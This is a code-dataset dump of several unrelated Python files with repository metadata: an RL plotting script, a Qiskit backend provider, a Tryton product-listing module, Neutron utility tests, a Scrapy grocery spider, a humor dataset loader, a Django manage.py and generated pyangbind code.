grid.get_celld()[(path_police[i-1])].set_facecolor(col_map[town_map[path_police[i-1]]])
grid.get_celld()[(path_police[i-1])].get_text().set_text('')
grid.get_celld()[(path_robber[i])].set_facecolor(LIGHT_ORANGE)
grid.get_celld()[(path_robber[i])].get_text().set_text('Robber')
grid.get_celld()[(path_police[i])].set_facecolor(LIGHT_RED)
grid.get_celld()[(path_police[i])].get_text().set_text('Police')
grid.get_celld()[0,0].get_text().set_text('SEB')
grid.get_celld()[0,0].get_text().set_color('white')
grid.get_celld()[0,5].get_text().set_text('SEB')
grid.get_celld()[0,5].get_text().set_color('white')
grid.get_celld()[2,0].get_text().set_text('SEB')
grid.get_celld()[2,0].get_text().set_color('white')
grid.get_celld()[2,5].get_text().set_text('SEB')
grid.get_celld()[2,5].get_text().set_color('white')
plt.pause(0.7)
plt.show()
town_map= np.array([
[ 1, 0, 0, 0, 0, 1],
[ 0, 0, 0, 0, 0, 0],
[ 1, 0, 0, 0, 0, 1]
])
rb = RobbingBanks(town_map)
p=rb.transition_probabilities
n=rb.n_states
for s in range(n):
    summ = np.sum(p[:, s, 3])
    if summ > 1:
        print(rb.states[s])
# PLOTTING VALUE_FUNC(INIT_STATE) AS A FUNCTION OF LAMBDA/GAMMA
"""
gammas = np.linspace(0.01,1,100,endpoint=False)
values = []
for gamma in gammas:
V, policy = value_iteration(rb, gamma, epsilon = 1e-6)
values.append(V[rb.map[(0,0,1,2)]])
plt.semilogy(gammas,values,'--')
plt.xlabel('Discount rate $\lambda$')
plt.ylabel('Value function V')
plt.title('Effect of $\lambda$ on V')
plt.plot()
#plt.show()
plt.savefig('Value_2b.png')
"""
# PLOTTING OPTIMAL POLICY FOR DIFFERENT LAMBDAS
"""
gammas = [0.1,0.5,0.8]
for gamma in gammas:
V, policy = value_iteration(rb, gamma, 1e-6)
path = rb.simulate(policy)
animate_solution(town_map, path, save_anim = False, until_caught = True,gamma=gamma)
""" | 37.297968 | 170 | 0.57308 | [
"MIT"
] | takeitbillykyle/EL2805-Reinforcement-Learning- | Assignment 2/robbing_banks.py | 16,523 | Python |
# -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=invalid-name, bad-continuation
"""Provider for local backends."""
import logging
from qiskit._qiskiterror import QISKitError
from qiskit.backends import BaseProvider
from .qasm_simulator_cpp import CliffordSimulatorCpp, QasmSimulatorCpp
from .qasm_simulator_py import QasmSimulatorPy
from .statevector_simulator_cpp import StatevectorSimulatorCpp
from .statevector_simulator_py import StatevectorSimulatorPy
from .unitary_simulator_py import UnitarySimulatorPy
logger = logging.getLogger(__name__)
SDK_STANDARD_BACKENDS = [
QasmSimulatorCpp,
QasmSimulatorPy,
StatevectorSimulatorCpp,
StatevectorSimulatorPy,
UnitarySimulatorPy,
CliffordSimulatorCpp,
]
class LocalProvider(BaseProvider):
"""Provider for local backends."""
def __init__(self, *args, **kwargs):
super().__init__(args, kwargs)
# Populate the list of local backends.
self.backends = self._verify_local_backends()
def get_backend(self, name):
return self.backends[name]
def available_backends(self, filters=None):
# pylint: disable=arguments-differ
backends = self.backends
filters = filters or {}
for key, value in filters.items():
backends = {name: instance for name, instance in backends.items()
if instance.configuration.get(key) == value}
return list(backends.values())
def aliased_backend_names(self):
return {
'local_qasm_simulator': ['local_qasm_simulator_cpp',
'local_qasm_simulator_py'],
'local_statevector_simulator': ['local_statevector_simulator_cpp',
'local_statevector_simulator_py'],
'local_unitary_simulator': ['local_unitary_simulator_cpp',
'local_unitary_simulator_py']
# TODO: restore after clifford simulator release
# 'local_clifford_simulator': ['local_clifford_simulator_cpp']
}
def deprecated_backend_names(self):
return {
'local_qiskit_simulator': 'local_qasm_simulator_cpp',
'wood_simulator': 'local_qasm_simulator_cpp',
}
@classmethod
def _verify_local_backends(cls):
"""
Return the local backends in `SDK_STANDARD_BACKENDS` that are
effectively available (as some of them might depend on the presence
of an optional dependency or on the existence of a binary).
Returns:
dict[str:BaseBackend]: a dict of the local backends instances for
the backends that could be instantiated, keyed by backend name.
"""
ret = {}
for backend_cls in SDK_STANDARD_BACKENDS:
try:
backend_instance = cls._get_backend_instance(backend_cls)
backend_name = backend_instance.configuration['name']
ret[backend_name] = backend_instance
except QISKitError as e:
# Ignore backends that could not be initialized.
logger.info('local backend %s is not available: %s',
backend_cls, str(e))
return ret
@classmethod
def _get_backend_instance(cls, backend_cls):
"""
Return an instance of a backend from its class.
Args:
backend_cls (class): Backend class.
Returns:
BaseBackend: a backend instance.
Raises:
QISKitError: if the backend could not be instantiated or does not
provide a valid configuration containing a name.
"""
# Verify that the backend can be instantiated.
try:
backend_instance = backend_cls()
except Exception as err:
raise QISKitError('Backend %s could not be instantiated: %s' %
(cls, err))
# Verify that the instance has a minimal valid configuration.
try:
_ = backend_instance.configuration['name']
except (LookupError, TypeError):
            raise QISKitError('Backend %s has an invalid configuration' %
                              backend_cls)
return backend_instance
| 35.829268 | 79 | 0.640345 | [
"Apache-2.0"
] | Hosseinyeganeh/qiskit-core | qiskit/backends/local/localprovider.py | 4,407 | Python |
# -*- coding: utf-8 -*-
"""
product.py
Implementing Add listing wizard for downstream modules:
* In the __setup__ method of `product.listing.add.start` in downstream
module, add the type as a valid channel type. Since this is non trivial
a convenience method `add_source` is provided which will add the source
type in an idempotent fashion.
* Implement a StateView in the `product.listing.add` wizard with the name
`start_<source_name>`. This StateView can change the state to other state
views or transitions. Eventually it should end with the `end` state.
"""
from collections import defaultdict
from trytond.pool import PoolMeta, Pool
from trytond.wizard import Wizard, Button, StateTransition, StateView
from trytond.transaction import Transaction
from trytond.model import ModelView, fields, ModelSQL, Unique
from trytond.pyson import Eval, Bool
__metaclass__ = PoolMeta
__all__ = [
'ProductSaleChannelListing', 'Product', 'AddProductListing',
'AddProductListingStart', 'TemplateSaleChannelListing',
'Template'
]
class AddProductListingStart(ModelView):
"Add listing form start"
__name__ = 'product.listing.add.start'
product = fields.Many2One(
'product.product', 'Product', readonly=True
)
channel = fields.Many2One(
'sale.channel', 'Channel', required=True,
domain=[('source', 'in', [])]
)
channel_source = fields.Function(
fields.Char("Channel Source"),
getter="on_change_with_channel_source"
)
@fields.depends('channel')
def on_change_with_channel_source(self, name=None):
return self.channel and self.channel.source
@classmethod
def add_source(cls, source):
"""
A convenience method for downstream modules to add channel
source types once they have implemented the step in the wizard
below.
This method must be called from `__setup__` method of downstream
module.
"""
source_leaf = cls.channel.domain[0][2]
if source not in source_leaf:
source_leaf.append(source)
class AddProductListing(Wizard):
"Add product Channel Listing Wizard"
__name__ = 'product.listing.add'
start = StateView(
'product.listing.add.start',
'sale_channel.listing_add_start_form', [
Button('Cancel', 'end', 'tryton-cancel'),
Button('Next', 'next', 'tryton-go-next', default=True),
]
)
next = StateTransition()
def default_start(self, fields):
return {
'product': Transaction().context['active_id']
}
def transition_next(self):
return 'start_%s' % self.start.channel.source
class Template:
"Product Template"
__name__ = 'product.template'
channel_listings = fields.One2Many(
'product.template.channel_listing', 'template', 'Channel Listings'
)
class TemplateSaleChannelListing(ModelSQL, ModelView):
"""
Template - Sale Channel
This model keeps a record of a template's association with Sale Channels.
"""
__name__ = 'product.template.channel_listing'
channel = fields.Many2One(
'sale.channel', 'Sale Channel',
domain=[('source', '!=', 'manual')],
select=True, required=True,
ondelete='RESTRICT'
)
template = fields.Many2One(
'product.template', 'Product Template', required=True,
select=True, ondelete='CASCADE'
)
template_identifier = fields.Char(
'Template Identifier', select=True, required=True
)
@classmethod
def __setup__(cls):
"""
Setup the class and define constraints
"""
super(TemplateSaleChannelListing, cls).__setup__()
table = cls.__table__()
cls._sql_constraints += [(
'channel_template_unique',
Unique(table, table.channel, table.template_identifier, table.template), # noqa
'Product Template is already mapped to this channel with same identifier' # noqa
)]
class Product:
"Product"
__name__ = "product.product"
channel_listings = fields.One2Many(
'product.product.channel_listing', 'product', 'Channel Listings',
)
@classmethod
def __setup__(cls):
super(Product, cls).__setup__()
cls._buttons.update({
'add_listing': {},
})
@classmethod
@ModelView.button_action('sale_channel.wizard_add_listing')
def add_listing(cls, products):
pass
@classmethod
def create_from(cls, channel, product_data):
"""
Create the product for the channel
"""
raise NotImplementedError(
"create_from is not implemented in product for %s channels"
% channel.source
)
class ProductSaleChannelListing(ModelSQL, ModelView):
'''Product - Sale Channel
This model keeps a record of a product's association with Sale Channels.
A product can be listed on multiple marketplaces
'''
__name__ = 'product.product.channel_listing'
# TODO: Only show channels where this ability is there. For example
# showing a manual channel is pretty much useless
channel = fields.Many2One(
'sale.channel', 'Sale Channel',
domain=[('source', '!=', 'manual')],
required=True, select=True,
ondelete='RESTRICT'
)
product = fields.Many2One(
'product.product', 'Product', select=True,
states={'required': Eval('state') == 'active'},
ondelete='CASCADE', depends=['state']
)
product_identifier = fields.Char(
"Product Identifier", select=True, required=True
)
state = fields.Selection([
('active', 'Active'),
('disabled', 'Disabled'),
], 'State', required=True, select=True)
channel_source = fields.Function(
fields.Char("Channel Source"),
getter="get_channel_source"
)
quantity = fields.Function(
fields.Float(
'Quantity',
digits=(16, Eval('unit_digits', 2)), depends=['unit_digits']
), 'get_availability_fields'
)
unit_digits = fields.Function(
fields.Integer('Unit Digits'), 'get_unit_digits'
)
availability_type_used = fields.Function(
fields.Selection([
('bucket', 'Bucket'),
('quantity', 'Quantity'),
('infinite', 'Infinite'),
], 'Type'), 'get_availability_fields'
)
availability_used = fields.Function(
fields.Selection([
('in_stock', 'In-Stock'),
('out_of_stock', 'Out Of Stock'),
], 'Availability', states={
'invisible': ~Bool(Eval('availability_type_used') == 'bucket')
}, depends=['availability_type_used']),
'get_availability_fields'
)
listing_url = fields.Function(
fields.Char('Listing URL'), 'get_listing_url'
)
@classmethod
def search_rec_name(cls, name, clause):
return [
'OR',
('product',) + tuple(clause[1:]),
('product_identifier',) + tuple(clause[1:]),
]
@classmethod
def get_unit_digits(cls, records, name):
result = {r.id: r.product.default_uom.digits if r.product else 2
for r in records}
return result
@classmethod
def get_listing_url(cls, records, name):
"""
Downstream modules should implement this function
and return a valid url
"""
return dict.fromkeys([r.id for r in records])
@classmethod
def get_availability_fields(cls, listings, names):
listing_ids = map(int, listings)
values = defaultdict(lambda: dict.fromkeys(listing_ids, None))
for name in names:
# Just call the default dict once so all fields have values
# even if product is absent
values[name]
for listing in listings:
if listing.product:
availability = listing.get_availability()
values['availability_type_used'][listing.id] = \
availability['type']
values['availability_used'][listing.id] = availability.get(
'value'
)
values['quantity'][listing.id] = availability.get('quantity')
return values
@classmethod
def get_channel_source(cls, records, name):
result = {r.id: r.channel and r.channel.source for r in records}
return result
@fields.depends('channel')
def on_change_with_channel_source(self, name=None):
return self.channel and self.channel.source
@classmethod
def __setup__(cls):
'''
Setup the class and define constraints
'''
super(ProductSaleChannelListing, cls).__setup__()
table = cls.__table__()
cls._sql_constraints += [
(
'channel_product_identifier_uniq',
Unique(table, table.channel, table.product_identifier),
'This external product is already mapped with same channel.'
)
]
cls._buttons.update({
'export_inventory_button': {},
})
@staticmethod
def default_state():
return 'active'
@classmethod
def create_from(cls, channel, product_data):
"""
Create a listing for the product from channel and data
"""
raise NotImplementedError(
"create_from is not implemented in channel listing for %s channels"
% channel.source
)
@classmethod
@ModelView.button
def export_inventory_button(cls, listings):
return cls.export_bulk_inventory(listings)
def export_inventory(self):
"""
Export listing.product inventory to listing.channel
Since external channels are implemented by downstream modules, it is
the responsibility of those channels to implement exporting or call
super to delegate.
"""
raise NotImplementedError(
"Export inventory is not implemented for %s channels"
% self.channel.source
)
@classmethod
def export_bulk_inventory(cls, listings):
"""
Export listing.product inventory to listing.channel in bulk
Since external channels are implemented by downstream modules, it is
the responsibility of those channels to implement bulk exporting for
respective channels.
Default behaviour is to export inventory individually.
"""
for listing in listings:
listing.export_inventory()
def import_product_image(self):
"""
Import specific product image from external channel based on product
identifier.
Since external channels are implemented by downstream modules, it is
the responsibility of those channels to implement importing or call
super to delegate.
"""
raise NotImplementedError(
"Method import_product_image is not implemented for %s channel yet"
% self.source
)
def get_availability_context(self):
"""
Allow overriding the context used to compute availability of
products.
"""
return {
'locations': [self.channel.warehouse.id],
}
def get_availability(self):
"""
Return the availability of the product for this listing
"""
Product = Pool().get('product.product')
with Transaction().set_context(**self.get_availability_context()):
rv = {'type': 'bucket', 'value': None, 'quantity': None}
if self.product:
product = Product(self.product.id)
rv['quantity'] = product.quantity
if rv['quantity'] > 0:
rv['value'] = 'in_stock'
else:
rv['value'] = 'out_of_stock'
return rv
| 31.224543 | 93 | 0.619199 | [
"BSD-3-Clause"
] | aniforprez/trytond-sale-channel | product.py | 11,959 | Python |
# Copyright 2012, VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import testtools
from neutron.agent.linux import utils
from neutron.tests import base
_marker = object()
class AgentUtilsExecuteTest(base.BaseTestCase):
def setUp(self):
super(AgentUtilsExecuteTest, self).setUp()
self.test_file = self.get_temp_file_path('test_execute.tmp')
open(self.test_file, 'w').close()
self.process = mock.patch('eventlet.green.subprocess.Popen').start()
self.process.return_value.returncode = 0
self.mock_popen = self.process.return_value.communicate
def test_without_helper(self):
expected = "%s\n" % self.test_file
self.mock_popen.return_value = [expected, ""]
result = utils.execute(["ls", self.test_file])
self.assertEqual(result, expected)
def test_with_helper(self):
expected = "ls %s\n" % self.test_file
self.mock_popen.return_value = [expected, ""]
self.config(group='AGENT', root_helper='echo')
result = utils.execute(["ls", self.test_file], run_as_root=True)
self.assertEqual(result, expected)
def test_stderr_true(self):
expected = "%s\n" % self.test_file
self.mock_popen.return_value = [expected, ""]
out = utils.execute(["ls", self.test_file], return_stderr=True)
self.assertIsInstance(out, tuple)
self.assertEqual(out, (expected, ""))
def test_check_exit_code(self):
self.mock_popen.return_value = ["", ""]
stdout = utils.execute(["ls", self.test_file[:-1]],
check_exit_code=False)
self.assertEqual(stdout, "")
def test_execute_raises(self):
self.mock_popen.side_effect = RuntimeError
self.assertRaises(RuntimeError, utils.execute,
["ls", self.test_file[:-1]])
def test_process_input(self):
expected = "%s\n" % self.test_file[:-1]
self.mock_popen.return_value = [expected, ""]
result = utils.execute(["cat"], process_input="%s\n" %
self.test_file[:-1])
self.assertEqual(result, expected)
def test_with_addl_env(self):
expected = "%s\n" % self.test_file
self.mock_popen.return_value = [expected, ""]
result = utils.execute(["ls", self.test_file],
addl_env={'foo': 'bar'})
self.assertEqual(result, expected)
def test_return_code_log_error_raise_runtime(self):
self.mock_popen.return_value = ('', '')
self.process.return_value.returncode = 1
with mock.patch.object(utils, 'LOG') as log:
self.assertRaises(RuntimeError, utils.execute,
['ls'])
self.assertTrue(log.error.called)
def test_return_code_log_error_no_raise_runtime(self):
self.mock_popen.return_value = ('', '')
self.process.return_value.returncode = 1
with mock.patch.object(utils, 'LOG') as log:
utils.execute(['ls'], check_exit_code=False)
self.assertTrue(log.error.called)
def test_return_code_log_debug(self):
self.mock_popen.return_value = ('', '')
with mock.patch.object(utils, 'LOG') as log:
utils.execute(['ls'])
self.assertTrue(log.debug.called)
def test_return_code_raise_runtime_do_not_log_fail_as_error(self):
self.mock_popen.return_value = ('', '')
self.process.return_value.returncode = 1
with mock.patch.object(utils, 'LOG') as log:
self.assertRaises(RuntimeError, utils.execute,
['ls'], log_fail_as_error=False)
self.assertFalse(log.error.called)
class AgentUtilsGetInterfaceMAC(base.BaseTestCase):
def test_get_interface_mac(self):
expect_val = '01:02:03:04:05:06'
with mock.patch('fcntl.ioctl') as ioctl:
ioctl.return_value = ''.join(['\x00' * 18,
'\x01\x02\x03\x04\x05\x06',
'\x00' * 232])
actual_val = utils.get_interface_mac('eth0')
self.assertEqual(actual_val, expect_val)
class AgentUtilsReplaceFile(base.BaseTestCase):
def test_replace_file(self):
# make file to replace
with mock.patch('tempfile.NamedTemporaryFile') as ntf:
ntf.return_value.name = '/baz'
with mock.patch('os.chmod') as chmod:
with mock.patch('os.rename') as rename:
utils.replace_file('/foo', 'bar')
expected = [mock.call('w+', dir='/', delete=False),
mock.call().write('bar'),
mock.call().close()]
ntf.assert_has_calls(expected)
chmod.assert_called_once_with('/baz', 0o644)
rename.assert_called_once_with('/baz', '/foo')
class TestFindChildPids(base.BaseTestCase):
def test_returns_empty_list_for_exit_code_1(self):
with mock.patch.object(utils, 'execute',
side_effect=RuntimeError('Exit code: 1')):
self.assertEqual(utils.find_child_pids(-1), [])
def test_returns_empty_list_for_no_output(self):
with mock.patch.object(utils, 'execute', return_value=''):
self.assertEqual(utils.find_child_pids(-1), [])
def test_returns_list_of_child_process_ids_for_good_ouput(self):
with mock.patch.object(utils, 'execute', return_value=' 123 \n 185\n'):
self.assertEqual(utils.find_child_pids(-1), ['123', '185'])
def test_raises_unknown_exception(self):
with testtools.ExpectedException(RuntimeError):
with mock.patch.object(utils, 'execute',
side_effect=RuntimeError()):
utils.find_child_pids(-1)
class TestGetRoothelperChildPid(base.BaseTestCase):
def _test_get_root_helper_child_pid(self, expected=_marker,
run_as_root=False, pids=None):
def _find_child_pids(x):
if not pids:
return []
pids.pop(0)
return pids
mock_pid = object()
with mock.patch.object(utils, 'find_child_pids',
side_effect=_find_child_pids):
actual = utils.get_root_helper_child_pid(mock_pid, run_as_root)
if expected is _marker:
expected = str(mock_pid)
self.assertEqual(expected, actual)
def test_returns_process_pid_not_root(self):
self._test_get_root_helper_child_pid()
def test_returns_child_pid_as_root(self):
self._test_get_root_helper_child_pid(expected='2', pids=['1', '2'],
run_as_root=True)
def test_returns_last_child_pid_as_root(self):
self._test_get_root_helper_child_pid(expected='3',
pids=['1', '2', '3'],
run_as_root=True)
def test_returns_none_as_root(self):
self._test_get_root_helper_child_pid(expected=None, run_as_root=True)
class TestPathUtilities(base.BaseTestCase):
def test_remove_abs_path(self):
self.assertEqual(['ping', '8.8.8.8'],
utils.remove_abs_path(['/usr/bin/ping', '8.8.8.8']))
def test_cmdlines_are_equal(self):
self.assertTrue(utils.cmdlines_are_equal(
['ping', '8.8.8.8'],
['/usr/bin/ping', '8.8.8.8']))
def test_cmdlines_are_equal_different_commands(self):
self.assertFalse(utils.cmdlines_are_equal(
['ping', '8.8.8.8'],
['/usr/bin/ping6', '8.8.8.8']))
| 40.252427 | 79 | 0.607212 | [
"Apache-2.0"
] | bradleyjones/neutron | neutron/tests/unit/agent/linux/test_utils.py | 8,292 | Python |
import logging
from urllib.parse import urljoin
import scrapy
from scrapy import Request
from scrapy_selenium import SeleniumRequest
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from sainsburys.items import SainsburysItem
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
class BasicSpider(scrapy.Spider):
name = 'basic'
allowed_domains = ['www.sainsburys.co.uk']
start_urls = ['https://www.sainsburys.co.uk/shop/gb/groceries/meat-fish']
def parse(self, response):
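        # Follow every department link listed on the meat & fish landing page.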
urls = response.css("ul.categories.departments li a::attr(href)").extract()
for url in urls:
yield response.follow(url, callback=self.parse_department)
def parse_department(self, response):
products = response.css("ul.productLister.gridView").extract()
if products:
for product in self.handle_product_listing(response):
yield product
pages = response.css("ul.categories.shelf li a::attr(href)").extract()
if not pages:
pages = response.css("ul.categories.aisles li a::attr(href)").extract()
if not pages:
return
for url in pages:
yield response.follow(url, callback=self.parse_department)
def handle_product_listing(self, response):
selector = 'button.ln-c-button'
urls = response.css("ul.productLister.gridView li.gridItem h3 a::attr(href)").extract()
for url in urls:
# yield response.follow(url, callback=self.parse_product)
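            # Render the product page with Selenium and wait until the page button is clickable before parsing.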
yield SeleniumRequest(url=url, callback=self.parse_product, wait_time=10, wait_until=EC.element_to_be_clickable((By.CSS_SELECTOR, selector)))
        next_page = response.css("#productLister > div.pagination.paginationBottom > ul > li.next > a::attr(href)").extract_first()
        if next_page:
            yield response.follow(next_page, callback=self.handle_product_listing)
def parse_product(self, response):
product_name = response.css("h1.pd__header::text").extract()[0]
product_image = response.css("img.pd__image::attr(src)").extract()[0]
item = SainsburysItem()
item["url"] = response.url
item["name"] = product_name
item["image"] = product_image
yield item
| 30.576923 | 153 | 0.667086 | [
"MIT"
] | carrasquel/scrapy-practice | sainsburys/sainsburys/spiders/basic.py | 2,385 | Python |
import pickle
import torch
from torch.utils.data import Dataset, DataLoader
import numpy as np
import torch.nn as nn
def load_pickle(pickle_file):
try:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f)
except UnicodeDecodeError as e:
with open(pickle_file, 'rb') as f:
pickle_data = pickle.load(f, encoding='latin1')
except Exception as e:
print('Unable to load data ', pickle_file, ':', e)
raise
return pickle_data
class HumorDataset(Dataset):
def __init__(self, id_list, max_context_len=5, max_sen_len=20):
self.id_list = id_list
openface_file = "openface_features_sdk.pkl"
covarep_file = "covarep_features_sdk.pkl"
language_file = "language_sdk.pkl"
word_embedding_list_file = "word_embedding_list.pkl"
humor_label_file = "humor_label_sdk.pkl"
self.word_aligned_openface_sdk = load_pickle(openface_file)
self.word_aligned_covarep_sdk = load_pickle(covarep_file)
self.language_sdk = load_pickle(language_file)
self.word_embedding_list_sdk = load_pickle(word_embedding_list_file)
self.humor_label_sdk = load_pickle(humor_label_file)
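        # Per-word feature sizes: OpenFace visual (371), COVAREP acoustic (81) and GloVe word embeddings (300).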
self.of_d = 371
self.cvp_d = 81
self.glove_d = 300
self.total_dim = self.glove_d + self.of_d + self.cvp_d
self.max_context_len = max_context_len
self.max_sen_len = max_sen_len
    # left padding with zero vector up to maximum number of words in a sentence * glove embedding dimension
def paded_word_idx(self, seq, max_sen_len=20, left_pad=1):
seq = seq[0:max_sen_len]
pad_w = np.concatenate((np.zeros(max_sen_len - len(seq)), seq), axis=0)
pad_w = np.array([self.word_embedding_list_sdk[int(w_id)]
for w_id in pad_w])
return pad_w
    # left padding with zero vector up to maximum number of words in a sentence * covarep dimension
def padded_covarep_features(self, seq, max_sen_len=20, left_pad=1):
seq = seq[0:max_sen_len]
return np.concatenate((np.zeros((max_sen_len - len(seq), self.cvp_d)), seq), axis=0)
    # left padding with zero vector up to maximum number of words in a sentence * openface dimension
def padded_openface_features(self, seq, max_sen_len=20, left_pad=1):
seq = seq[0:max_sen_len]
return np.concatenate((np.zeros(((max_sen_len - len(seq)), self.of_d)), seq), axis=0)
    # left padding with zero vectors up to maximum number of sentences in context * maximum number of words in a sentence * total feature dimension
def padded_context_features(self, context_w, context_of, context_cvp, max_context_len=5, max_sen_len=20):
context_w = context_w[-max_context_len:]
context_of = context_of[-max_context_len:]
context_cvp = context_cvp[-max_context_len:]
padded_context = []
for i in range(len(context_w)):
p_seq_w = self.paded_word_idx(context_w[i], max_sen_len)
p_seq_cvp = self.padded_covarep_features(
context_cvp[i], max_sen_len)
p_seq_of = self.padded_openface_features(
context_of[i], max_sen_len)
padded_context.append(np.concatenate(
(p_seq_w, p_seq_cvp, p_seq_of), axis=1))
pad_c_len = max_context_len - len(padded_context)
padded_context = np.array(padded_context)
# if there is no context
if not padded_context.any():
return np.zeros((max_context_len, max_sen_len, self.total_dim))
return np.concatenate((np.zeros((pad_c_len, max_sen_len, self.total_dim)), padded_context), axis=0)
def padded_punchline_features(self, punchline_w, punchline_of, punchline_cvp, max_sen_len=20, left_pad=1):
p_seq_w = self.paded_word_idx(punchline_w, max_sen_len)
p_seq_cvp = self.padded_covarep_features(punchline_cvp, max_sen_len)
p_seq_of = self.padded_openface_features(punchline_of, max_sen_len)
return np.concatenate((p_seq_w, p_seq_cvp, p_seq_of), axis=1)
def __len__(self):
return len(self.id_list)
def __getitem__(self, index):
hid = self.id_list[index]
punchline_w = np.array(
self.language_sdk[hid]['punchline_embedding_indexes'])
punchline_of = np.array(
self.word_aligned_openface_sdk[hid]['punchline_features'])
punchline_cvp = np.array(
self.word_aligned_covarep_sdk[hid]['punchline_features'])
context_w = np.array(
self.language_sdk[hid]['context_embedding_indexes'])
context_of = np.array(
self.word_aligned_openface_sdk[hid]['context_features'])
context_cvp = np.array(
self.word_aligned_covarep_sdk[hid]['context_features'])
# punchline feature
x_p = torch.LongTensor(
self.padded_punchline_features(punchline_w, punchline_of, punchline_cvp, self.max_sen_len))
# context feature
x_c = torch.LongTensor(
self.padded_context_features(context_w, context_of, context_cvp, self.max_context_len, self.max_sen_len))
y = torch.FloatTensor([self.humor_label_sdk[hid]])
return x_p, x_c, y
| 42.455285 | 127 | 0.677135 | [
"MIT"
] | HughMun/MultiBench | deprecated/dataloaders/affect/humor_dataset.py | 5,222 | Python |
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "travel.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| 34.956522 | 77 | 0.641791 | [
"MIT"
] | NaimJamalludin/Travelevart | travel/manage.py | 804 | Python |
class Solution:
def maxChunksToSorted(self, arr):
"""
:type arr: List[int]
:rtype: int
"""
stacks = []
for num in arr:
if not stacks:
stacks.append([num])
elif num >= stacks[-1][0]:
stacks.append([num])
else:
# num < stacks[-1][0]
stacks[-1].append(num)
while len(stacks) >= 2:
if num < stacks[-2][0]:
stacks[-2][0] = max(stacks[-2][0], stacks[-1][0])
stacks[-2].extend(stacks.pop())
else:
break
# print(stacks)
return len(stacks)
sol = Solution().maxChunksToSorted
print(sol([5, 4, 3, 2, 1]))
print(sol([2, 1, 3, 4, 4]))
print(sol([5, 3, 1, 2, 4]))
print(sol([1, 0, 1, 3, 2]))
print(sol([5, 1, 1, 8, 1, 6, 5, 9, 7, 8]))
| 28.71875 | 73 | 0.40914 | [
"MIT"
] | feigaochn/leetcode | p768_max_chunks_to_make_sorted_ii.py | 919 | Python |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class lsp_admin_group_include_any(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/show-mpls-lsp-extensive/output/lsp/show-mpls-lsp-extensive-info/show-mpls-lsp-sec-path-info/sec-path/lsp-sec-path-config-admin-groups/lsp-admin-group/lsp-admin-group-include-any. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp_admin_group_include_any_group_id',)
_yang_name = 'lsp-admin-group-include-any'
_rest_name = 'lsp-admin-group-include-any'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__lsp_admin_group_include_any_group_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="lsp-admin-group-include-any-group-id", rest_name="lsp-admin-group-include-any-group-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'brocade_mpls_rpc', u'show-mpls-lsp-extensive', u'output', u'lsp', u'show-mpls-lsp-extensive-info', u'show-mpls-lsp-sec-path-info', u'sec-path', u'lsp-sec-path-config-admin-groups', u'lsp-admin-group', u'lsp-admin-group-include-any']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'show-mpls-lsp-extensive', u'output', u'lsp', u'sec-path', u'lsp-sec-path-config-admin-groups', u'lsp-admin-group-include-any']
def _get_lsp_admin_group_include_any_group_id(self):
"""
